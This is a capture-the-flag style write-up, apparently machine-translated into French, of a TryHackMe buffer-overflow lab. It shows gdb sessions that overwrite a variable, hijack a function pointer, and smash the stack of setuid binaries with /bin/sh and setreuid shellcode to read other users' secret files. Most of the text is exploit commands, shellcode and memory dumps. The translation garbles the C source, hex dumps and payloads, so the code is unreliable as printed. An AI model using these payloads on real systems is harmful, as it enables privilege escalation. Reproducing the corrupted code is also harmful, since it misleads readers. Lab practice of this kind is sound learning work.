[Tryhackme] J'ai en fait essayé le débordement de tampon! Buffer déborde la rédaction

┌fiques (hackLab㉿hackLab) - [~] └─ $ ssh user1@10.10.165.6 L'authenticité de l'hôte '10 .10.165.6 (10.10.165.6) 'ne peut pas être établie. ED25519 l'empreinte digitale clé est SHA256: asf56rwywwhaw06lwzfqzsby9 + gun1jrymqrk3fp5du. Cette clé n'est connue par d'autres noms, êtes-vous sûr de continuer à vous connecter (oui / non / [empreinte digitale])? Oui AVERTISSEMENT: Ajouté en permanence '10 .10.165.6 '(ED25519) à la liste des hôtes connus. user1@10.10.165.6's Mot de passe: Dernière connexion: mer 27 novembre 21:42:30 2019 de 82.34.52.37 __ | __ | _) _ | (/ Amazon Linux 2 ami ___ | \ ___ | https://aws.amazon.com/amazon-inux-2/ [user1 @ ip-10-10-165-6 ~] $ 

[user1 @ ip-10-10-165-6 Overflow-1] $ cat int-overflow.c #include<stdlib.h> #inclure<unistd.h> #inclure<stdio.h> int main (int argc, char ** argv) {volatile int variable = 0; tampon char [14]; obtient (tampon); if (variable! = 0) {printf ("Vous avez modifié la valeur de la variable \ n"); } else {printf ("réessayer? \ n"); }}

[user1 @ ip-10-10-165-6 Overflow-1] $ gcc int-overflow.c [user1 @ ip-10-10-165-6 overflow-1] $ ./a.out 01234567890123 Ressayer?

[user1 @ ip-10-10-165-6 Overflow-1] $ ./A.out 012345678901234 Vous avez modifié la valeur de la variable

[User1 @ IP-10-10-22-183 Overflow-2] $ Cat func-pointer.c #include<stdlib.h> #inclure<unistd.h> #inclure<stdio.h> void spécial () {printf ("Ceci est la fonction spéciale \ n"); printf ("Vous avez fait ceci, ami! \ n"); } void normal () {printf ("Ceci est la fonction normale \ n"); } void autre () {printf ("Pourquoi est-ce ici?"); } int main (int argc, char ** argv) {volatile int (* new_ptr) () = normal; tampon char [14]; obtient (tampon); new_ptr (); }

[User1 @ IP-10-10-22-183 Overflow-2] $ gdb func-pointer GNU GDB (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3 Copyright (C) 2017 Free Software Foundation, Inc. Licence GPLV3 +: GNU GPL version 3 ou tard<http://gnu.org/licenses/gpl.html> Ceci est un logiciel gratuit: vous êtes libre de le changer et de le redistribuer. Il n'y a pas de garantie, dans la mesure permise par la loi. Tapez "Afficher la copie" et "AVERTISSEMENT AVERTISSEMENT" pour plus de détails. Ce GDB a été configuré comme "x86_64-redhat-linux-gni". Tapez "Afficher la configuration" pour les détails de configuration. Pour les instructions de rapport de bogues, veuillez consulter:<http://www.gnu.org/software/gdb/bugs/> . Trouvez le manuel GDB et d'autres ressources de documentation en ligne sur:<http://www.gnu.org/software/gdb/documentation/> . Pour obtenir de l'aide, tapez "Aide". Tapez "APROPOS Word" pour rechercher des commandes liées à "Word" ... Symboles de lecture de Func-Pointer ... (Aucun symbole de débogage trouvé) ... fait. (gdb) Définir les colonnes EXEC-WAPPAPPER ENV -U

(GDB) Exécutez le programme de démarrage: / home / user1 / overflow-2 / func-poter manquant debuginfos, utilisation: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64 1234567890123 Il s'agit de la fonction normale [inférieur 1 (processus 3567) éteint normalement]]

(GDB) Exécuter le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / Home / User1 / Overflow-2 / Func-Pointer 123456789012345 Programme reçu Signal Sigsegv, défaut de segmentation. 0x0000000400035 dans ?? ()

(GDB) Exécuter le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / Home / User1 / Overflow-2 / Func-Pointer 1234567890123455555 Programme reçu Signal Sigsegv, défaut de segmentation. 0x0000353535 dans ?? ()

(GDB) Exécuter le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / Home / User1 / Overflow-2 / Func-Pointer 12345678901234555555 Programme reçu Signal Sigsegv, défaut de segmentation. 0x00000004005da dans main ()

(GDB) Désassemblement du vidage spécial du code de l'assembleur pour la fonction spécial: 0x0000000400567 <+0>: Push% RBP 0x0000000400568 <+1>: MOV% RSP,% RBP 0x0000000040056B <+4>: MOV 0x400680,% EDI 0x000000400570<puts@plt> 0x000000000400575 <+14>: Mov 0x40069d,% edi 0x0000000040057a <+19>: Callq 0x400460<puts@plt> 0x0000000040057f <+24>: NOP 0x00000000400580 <+25>: Pop% RBP 0x0000000400581 <+26>: fin de la fin du vidage de l'assembleur.

\ x67 \ x05 \ x40 \ x00 \ x00 \ x00 \ x00

g ^ e @

(GDB) Exécuter le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / Home / User1 / Overflow-2 / Func-Pointer 12345678901234G ^ E @ Ceci est la fonction spéciale que vous avez fait, ami! [Inférieur 1 (processus 5144) est sorti normalement]

[User1 @ IP-10-10-22-183 Overflow-2] $ ./func-pointer 12345678901234g ^ e @ c'est la fonction spéciale que vous avez fait, ami!

[User1 @ IP-10-10-22-183 Overflow-3] $ Cat Buffer-Overflow.c #include<stdio.h> #inclure<stdlib.h> void copy_arg (char * string) {char tampon [140]; strcpy (tampon, chaîne); printf ("% s \ n", tampon); retour 0; } int main (int argc, char ** argv) {printf ("voici un programme qui écho est à votre entrée \ n"); copy_arg (argv [1]); }

[User1 @ IP-10-10-22-183 Overflow-3] $ GDB Buffer-Overflow GNU GDB (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3 Copyright (C) 2017 Free Software Foundation, Inc. Licence GPLV3 +: GNU GPL version 3 ou tard<http://gnu.org/licenses/gpl.html> Ceci est un logiciel gratuit: vous êtes libre de le changer et de le redistribuer. Il n'y a pas de garantie, dans la mesure permise par la loi. Tapez "Afficher la copie" et "AVERTISSEMENT AVERTISSEMENT" pour plus de détails. Ce GDB a été configuré comme "x86_64-redhat-linux-gni". Tapez "Afficher la configuration" pour les détails de configuration. Pour les instructions de rapport de bogues, veuillez consulter:<http://www.gnu.org/software/gdb/bugs/> . Trouvez le manuel GDB et d'autres ressources de documentation en ligne sur:<http://www.gnu.org/software/gdb/documentation/> . Pour obtenir de l'aide, tapez "Aide". Tapez "APROPOS Word" pour rechercher des commandes liées à "Word" ... Symboles de lecture de Buffer-Overflow ... (Aucun symbole de débogage trouvé) ... fait.

(gdb) exécuter $ (python -c "print ('a' * 148)") Programme de démarrage: / home / user1 / overflow-3 / buffer-overflow $ (python -c "print ('a' * 148)") manquant debuginfos séparé, utilisez: debuginfo-install glibc-2.26-32.amzn2.0. Entrée Programme AAAAA a reçu le signal SIGSEGV, défaut de segmentation. 0x00000000400595 dans Main ()

(gdb) exécuter $ (python -c "print ('a' * 153)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / home / user1 / overflow-3 / buffer-overflow $ (python -c "print ('a' * 153)") Voici un programme qui fait écho à votre entrée AAAAA Programme reçu SIGSEGV, défaut de segmentation. 0x00000000400041 en ?? ()

(gdb) exécuter $ (python -c "print ('a' * 158)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / home / user1 / overflow-3 / buffer-overflow $ (python -c "print ('a' * 158)") Voici un programme qui fait écho à votre entrée AAAAA Programme reçu SIGSEGV, défaut de segmentation. 0x00004141414141 dans ?? ()

(gdb) exécuter $ (python -c "print ('a' * 159)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (y ou n) y Programme de démarrage: / home / user1 / overflow-3 / buffer-overflow $ (python -c "print ('a' * 159)") Voici un programme qui échoue le programme de votre programme AAAAA a reçu SIGSEGV, défaut de segmentation. 0x00000000400563 dans copy_arg ()

push 0x3b pop% eax xor% rdx,% rdx movabs 0x68732f6e69622f2f,% r8 shR 0x8,% r8 push% r8 mov% rsp,% rdi push% rdx push% rdi mov% rsp,% rsi syscalle <-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05

(gdb) exécuter $ (python -c "imprimer 'A' * 100 + '\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xE8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' b '* 6 ") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (y ou n) y Programme de départ: / home / user1 / overflow-3 / buffer-overflow $ (python -c " '\ x90' * 100 + '\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ XE8 \ X08 \ X 41 \ x50 \ x48 \ x89 \ XE7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' b '* 6 ") Voici un programme qui fait écho à votre entrée j; xh1i // bin / shiaphrwhj

(GDB) x / 100x $ RSP-200 0x7ffffFFE228: 0x00400450 0x00000000 0xffffe3e0 0x000007ffff 0x7ffffffFe238: 0x00400561 0x00000000 0xf7dce8c0 0x007ffff 0x7ffffffffe248: 0xffe64affffffff 0x7ffffFFFFE248: 0xffe64aFffffffffr 0x7ffffFFFFE248: 0xFFFFE64A. 0x00007ffff 0x414141 0x414141 0x7fffffffffe258: 0x414141 0x414141 0x414141 0x414141 0x414141 0x4141414141414141414141410 0x414141 0x7ffffffffe268: 0x414141 0x414141 0x414141 0x414141 0x414141 0x7ffffffe278: 0x414141 0x414141 0x41410 0x414141 0x414141 0x414141 0x414141 0x414141 0x7ffffffe2a8: 0x414141 0x414141 0x414141 0x414141 0x68732f6e 0x08e8c149 0x7fffffffffe2c8: 0x89485041 0x485752e7 0x050fe689 0x48583c6a 0x7ffffffffffe2d8: 0x050ffff31 0x414141 0x414141 0x4141414141410 0x414141 0x4141414141410 0x4141410 0x414141 0x414141 0x7fffffffffe2e8: 0x424242 0x00004242 0xfffffe3e8 0x0000007ffff 0x7ffffffe2f8: 0x0000000 0x0000002 0x004005a02 0x00007ffff 0x0000000 0x000000 0x7fffffffe318: 0xffffe3e8 0x00007ffff 0x000040000 0x0000002 0x7ffffffe328: 0x0040000564 0x0000002 0x000000 0x0000 0x7ffffFe338: 0x00000000000000 0x7fffffe338: 0x654a4a4af5 0xcc0a789a 0x00400450 0x0000000 0x7ffffffe348: 0xFFFFE3E0 0x0000000 0x000000 0x7ffffFFE358: 0x000000 0x0000000000000FI 0x7fffffffe368: 0x31ce4ef5 0x33f59752 0x000000 0x000000 0x7ffffFFFE378: 0x000000 0x000000 0x0000000 0xf7de7656 0x00007ffff 0x0000000 0x0000000 0x7ffffffFffe3a8: 0x000000 0x0000000 0x0000000

(gdb) exécuter $ (python -c "imprimer '\ x90' * 100 + '\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' b '* 6 ") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (y ou n) y Programme de départ: / home / user1 / overflow-3 / buffer-overflow $ (python -c " '\ x90' * 100 + '\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x73 \ x68 \ x49 \ xc1 \ XE8 \ X08 \ X 41 \ x50 \ x48 \ x89 \ XE7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' b '* 6 ") Voici un programme qui fait écho à votre entrée j; xh1i // bin / shiaphrwhj

(GDB) x / 100x $ RSP-200 0x7ffffFffe228: 0x00400450 0x00000000 0xffffe3e0 0x000007ffff 0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x007ffff 0x7fffffffffffe248: 0xffe64affff 0x7fffffffffffe248: 0xffe64affff 0x7fffffffffffe248: 0xffe64affff. 0x00007ffff 0x90909090 0x909090 0x7ffffffFffe258: 0x909090 0x909090 0x909090 0x7ffffffFFFFFFFFE 0x909090 0x909090 0x909090 0x7fffffffffe278: 0x909090 0x909090 0x909090 0x909090 0x7fffffffffe288: 0x909090 0x909090 0x909090 0x7fffffffffe288: 0x909090 0x909090 0x909090 0x7ffffffFffe288: 0x909090 0x909090 0x909090 0x90909090 0x48583b6a 0x7ffffffe2B8: 0xB849D231 0x69622fFe2: 0xb849d2311 0x696222 0x68732f6e 0x08e8c149 0x7fffffffffe2c8: 0x89485041 0x485752e7 0x050fe689 0x48583c6a 0x7ffffffffffe2d8: 0x050ffff31 0x414141 0x414141 0x4141414141410 0x414141 0x4141414141410 0x4141410 0x414141 0x7ffffffffFffe2e8: 0x424242 0x00004242 0xfffffe3e8 0x00007ffff 0x7fffffffe2f8: 0x0000000 0x000000 0x7fffffffe318: 0xffffe3e8 0x00007ffff 0x000040000 0x0000002 0x7ffffFFE328: 0x00400564 0x000000000000000 0x000000 0x7FFFFFE338: 0x02CE8E0B 0x844e9507 0x00400450202CE8E0B 0X844E9507 0x00400450450 0x0000000 0x7fffffffe348: 0xffffe3e0 0x0000000 0x000000 0x7ffffFe358: 0x0000000 0x000000 0xcfae8e0b 0x7bb16a78 0x7ffffffe368: 0x564a8e0b 0x7B17ACF 0x000000000000000000000000B 0x7B17ACF 0x0000000000000000000000 0x7fffffffe378: 0x000000 0x0000000 0x000000 0x0000000 0x7ffffFFE388: 0xfffffe400 0x00007ffff 0xf7fffe130 0x00007ffff 0x7fffffffe398: 0xf7DE7656 0x00007FFFFFF 0x0000000 0x00000000000 0x7fffffffffe3a8: 0x000000 0x0000000 0x0000000

(gdb) exécuter $ (python -c "imprimer '\ x90' * 100 + '\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x 48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' \ x98 \ xe2 \ xff \ xff \ xff \ x7f '") Programme de démarrage: / home / user1 / overflow-3 / buffer-overflow $ (python -c "imprimer '\ x90' * 100 + '\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' \ x98 \ xe2 \ xff \ xff \ xff \ x7f '"") Voici un programme qui fait écho à votre entrée j; xh1i // bin / shiaphrwhj 

SH-4.2 $ Whoami Détachement après fourche du processus enfant 5377. User1

SH-4.2 $ ls -l détachement après fourche du processus enfant 5380. Total 20 -rwsrwxr-x 1 User2 User2 8264 2 sept -rw------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

[user1 @ ip-10-10-22-183 Overflow-3] $ cat / etc / passwd Root: x: 0: 0: root: / root: / bin / bash bin: x: 1: 1: bin: / bin: / sbin / nologin daemon: x: 2: 2: démon: / sbin: / sbin / nologin daemon: x: 2: 2: démon: / sbin: / sbin / nologin Daemon Adm: X: 3: 4: Adm: / var / adm: / sbin / nologin lp: x: 4: 7: lp: / var / spool / lpd: / sbin / nologin Sync: x: 5: 0: sync: / sbin: / bin / syncor HALT: X: 7: 0: Halt: / Sbin: / Sbin / Halt Mail: X: 8: 12: Mail: / var / Spool / Mail: / Sbin / Nologin Opérateur: X: 11: 0: Opérateur: / Root: / Sbin / Nologin Games: X: 12: 100: Jeux: / USR / Games: / Sbin / Nologin Ftp: X: 14: 50: FTP Utilisateur: / var / ftp: / sbin / nologin Nobody: X: 99: 99: Personne: /: / sbin / nologin systemd-network: x: 192: 192: Systemd Network Management: /: / sbin / nologin dbus: x: 81: 81: System Message Bus: /: / sbin / nologin RPC: Daemon: / var / lib / rpcbind: / sbin / nologin libstoragemgmt: x: 999: 997: dami compte pour libstoragemgmt: / var / run / lsm: / sbin / nologin sshd: x: 74: 74: privilege-sekaated ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vid RPCUSER: X: 29: 29: Service RPC User: / var / lib / nfs: / sbin / nologin nfsnobody: x: 65534: 65534: User anonymous NFS: / var / lib / nfs: / sbin / nologin EC2-Instance-Connect: X: 998: 996 :: / Home / EC2-Instance-Connect: / Sbin / Nologin Postfix: X: 89: 89 :: / var / Spool / Postfix: / Sbin / Nologin Chrony: X: 997: 995 :: / var / lib / chrony: / sbin / nologin tcpdump: x: 72: 72 :: / sbin / nologin ec2-user: x: 1000: 1000: ec2 user par défaut: / home / ec2-user: / bin / bash user1: x: 1001: 1001 :: / home / user1: User3: x: 1003: 1003 :: / home / user3: / bin / bash

┌fique (hackLab㉿hackLab) - [~] └sé. $ Pwn shellcraft -fd amd64.linux.setreuid 1002 \ x31 \ xff \ x66 \ xbf \ xea \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x05

[User1 @ IP-10-10-22-183 Overflow-3] $ ./buffer-overflow $ (python -c " '\ x90' * 86 + '\ x31 \ xff \ x66 \ xbf \ xea \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x0 5 \ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6 a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '* 12 +' \ x98 \ xe2 \ xff \ xff \ xff \ x7f '") Voici un programme qui fait écho à votre entrée 1fjqxhj; xh1i // bin / shiaphrwhj

SH-4.2 $ Cat Secret.txt OmgyudidThissocool !!

[User1 @ IP-10-10-232-238 Overflow-4] $ Cat Buffer-Overflow-2.c #include<stdio.h> #inclure<stdlib.h> void concat_arg (char * string) {char tampon [154] = "doggo"; strcat (tampon, chaîne); printf ("New Word est% s \ n", tampon); retour 0; } int main (int argc, char ** argv) {concat_arg (argv [1]); }

[User1 @ IP-10-10-232-238 Overflow-4] $ GDB Buffer-Overflow-2 GNU GDB (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3 Copyright (C) 2017 Free Software Foundation, Inc. Licence GPLV3 +: GNU GPL Version 3 ou plus tard<http://gnu.org/licenses/gpl.html> Ceci est un logiciel gratuit: vous êtes libre de le changer et de le redistribuer. Il n'y a pas de garantie, dans la mesure permise par la loi. Tapez "Afficher la copie" et "AVERTISSEMENT AVERTISSEMENT" pour plus de détails. Ce GDB a été configuré comme "x86_64-redhat-linux-gni". Tapez "Afficher la configuration" pour les détails de configuration. Pour les instructions de rapport de bogues, veuillez consulter:<http://www.gnu.org/software/gdb/bugs/> . Trouvez le manuel GDB et d'autres ressources de documentation en ligne sur:<http://www.gnu.org/software/gdb/documentation/> . Pour obtenir de l'aide, tapez "Aide". Tapez "APROPOS Word" pour rechercher des commandes liées à "Word" ... Reading Symboles de Buffer-Overflow-2 ... (Aucun symbole de débogage trouvé) ... fait. (GDB) 

(gdb) exécuter $ (python -c "print ('a' * 162)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / home / user1 / overflow-4 / buffer-overflow-2 $ (python -c "print ('a' * 157)") Nouveau mot est dogoaaaaaaa le programme reçu sigsegv, défaut de segmentation. 0x000000004005d3 dans main ()

(gdb) exécuter $ (python -c "print ('a' * 164)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (y ou n) y Programme de démarrage: / home / user1 / overflow-4 / buffer-overflow-2 $ (python -c "print ('a' * 164)") Nouveau mot est dogoaaaaaaa le programme reçu sigsegv, défaut de segmentation. 0x00000000400041 en ?? ()

(gdb) exécuter $ (python -c "print ('a' * 169)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / home / user1 / overflow-4 / buffer-overflow-2 $ (python -c "print ('a' * 169)") Nouveau mot est dogoaaaaaaa le programme reçu sigsegv, défaut de segmentation. 0x00004141414141 dans ?? ()

(gdb) exécuter $ (python -c "print ('a' * 170)") Le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / home / user1 / overflow-4 / buffer-overflow-2 $ (python -c "print ('a' * 170)") Nouveau mot est dogoaaaaaaaa le programme reçue sigsegv, défaut de segmentation. 0x000000004005AB dans Concat_arg ()

\ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05

[user1 @ ip-10-10-232-238 Overflow-4] $ cat / etc. Adm: X: 3: 4: Adm: / var / adm: / sbin / nologin lp: x: 4: 7: lp: / var / spool / lpd: / sbin / nologin Sync: x: 5: 0: sync: / sbin: / bin / syncor HALT: X: 7: 0: Halt: / Sbin: / Sbin / Halt Mail: X: 8: 12: Mail: / var / Spool / Mail: / Sbin / Nologin Opérateur: X: 11: 0: Opérateur: / Root: / Sbin / Nologin Games: X: 12: 100: Jeux: / USR / Games: / Sbin / Nologin Ftp: X: 14: 50: FTP Utilisateur: / var / ftp: / sbin / nologin Nobody: X: 99: 99: Personne: /: / sbin / nologin systemd-network: x: 192: 192: Systemd Network Management: /: / sbin / nologin dbus: x: 81: 81: System Message Bus: /: / sbin / nologin RPC: Daemon: / var / lib / rpcbind: / sbin / nologin libstoragemgmt: x: 999: 997: dami compte pour libstoragemgmt: / var / run / lsm: / sbin / nologin sshd: x: 74: 74: privilege-sekaated ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vide / sshd: / sbin / nologin ssh: / var / vid RPCUSER: X: 29: 29: Service RPC User: / var / lib / nfs: / sbin / nologin nfsnobody: x: 65534: 65534: User anonymous NFS: / var / lib / nfs: / sbin / nologin EC2-Instance-Connect: X: 998: 996 :: / Home / EC2-Instance-Connect: / Sbin / Nologin Postfix: X: 89: 89 :: / var / Spool / Postfix: / Sbin / Nologin Chrony: X: 997: 995 :: / var / lib / chrony: / sbin / nologin tcpdump: x: 72: 72 :: / sbin / nologin ec2-user: x: 1000: 1000: ec2 user par défaut: / home / ec2-user: / bin / bash user1: x: 1001: 1001 :: / home / user1: User3: x: 1003: 1003 :: / home / user3: / bin / bash

┌fique (HackLab㉿HackLab) - [~] └─ $ pwn shellcraft -fd amd64.linux.setReUid 1003 \ x31 \ xff \ x66 \ xbf \ xeb \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x05

# \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05

(gdb) exécuter $ (python -c "imprimer '\x90'*87+'\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '* 22 +') Le programme débogué a déjà été lancé. Commencez-le depuis le début? (Y ou N) Y Programme de démarrage: / Home / User1 / Overflow-4 / Buffer-Overflow-2 $ (Python -C " '\x90'*87+'\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6a \ x3c \ x58 \ x31 \ xff \ x0f \ x05 '+' a '* 22 +') Le nouveau mot est doggo1fjqxhj; xh1i // bin / shiaphrwhj

(gdb) x / 100x $ RSP-200 0x7ffffFffe218: 0x004005a9 0x000000000 0xf7fffa268 0x00007ffff 0x7fffffffe228: 0xffffe63a 0x007ffff 0xfffffffffe 0x90909090 0x909090 0x909090 0x909090 0x7fffffffffe248: 0x90909090 0x909090 0x7fffffffffe248: 0x909090 0x909090 0x909090 0x909090 0x909090 0x909090 0x909090 0x909090 0x7fffffffe258: 0x909090 0x909090 0x909090 0x909090 0x909090 0x7ffffffffffe 0x7fffffffffe278: 0x909090 0x909090 0x909090 0x7fffffffe278: 0x909090 0x909090 0x909090 0x7ffffffffe288: 0x9090 0xbf66ff3110x716a03ebf6fff31 0x716a03ebf. 0xfe894858 0x7ffffffffffe298: 0x3b6a050f 0xd2314858 0x2f2fb849 0x2f6e6962 0x7ffffffe2a8: 0xc1496873 0x504108e8 0x52e78948 0xe68948577 0x7fffffffe2b8: 0x3c6a050f 0xff314858 0x4141050f 0x414141 0x7fffffffe2c8: 0x414141 0x414141 0x414141 0x414141 0x414141 0x7fffffffe2d8: 0x424242 0x00004242 0xfffffe3d8 0x00007ffff 0x7fffffffe2e8: 0x0000000 0x0000002 0x004005e0 0x0000000 0x7ffffffe2f8: 0xf7a4302a 0x0000008 0x00007ffff 0x000040000 0x0000002 0x7fffffffffe318: 0x004005ac 0x000000 0x000000 0x000000 0x7fffffffffe328: 0x04bbf356 0x29eb8017 0x00400450 0x0000000 0x7fffffffe338: 0xffffe3d0 0x0000000 0x000000 0x7fffffffe348: 0x0000000 0x000000 0x7ffffffe348: 0x0000000 0x000000 0xc97bf356 0xd6147f68 0x7ffffffe358: 0x500000000000006 0xd6146fdf 0x0000000000000000000000 0x7fffffffe368: 0x0000000 0x000000 0x0000000 0x0000000 0x7ffffFFE378: 0xFFFFFE3F0 0x000007FFFFF 0xf7fffe130 0x00007ffff 0x7ffffffe388: 0xf7De7656 0x00007FFFFFFFFFFFE388: 0xF7DE7656 0x00007FFFFFFFF 0x0000000 0x00000000. 0x7fffffffffe398: 0x000000 0x0000000 0x0000000

[user1 @ ip-10-10-232-238 Overflow-4] $ ./buffer-overflow-2 $ (python -c " '\ x90' * 87 + '\ x31 \ xff \ x66 \ xbf \ xeb \ x03 \ x6a \ x71 \ x58 \ x48 \ x89 \ xfe \ x0f \ x0 5 \ x6a \ x3b \ x58 \ x48 \ x31 \ xd2 \ x49 \ xb8 \ x2f \ x2f \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x49 \ xc1 \ xe8 \ x08 \ x41 \ x50 \ x48 \ x89 \ xe7 \ x52 \ x57 \ x48 \ x89 \ xe6 \ x0f \ x05 \ x6 a \ x3c \ x58 \ x48 \ x31 \ xff \ x0f \ x05 '+' a '* 22 +' \ x88 \ xe2 \ xff \ xff \ xff \ x7f '") Le nouveau mot est doggo1fjqxhj; xh1i // bin / shiaphrwhj

SH-4.2 $ Cat secret.txt wowanothertime !!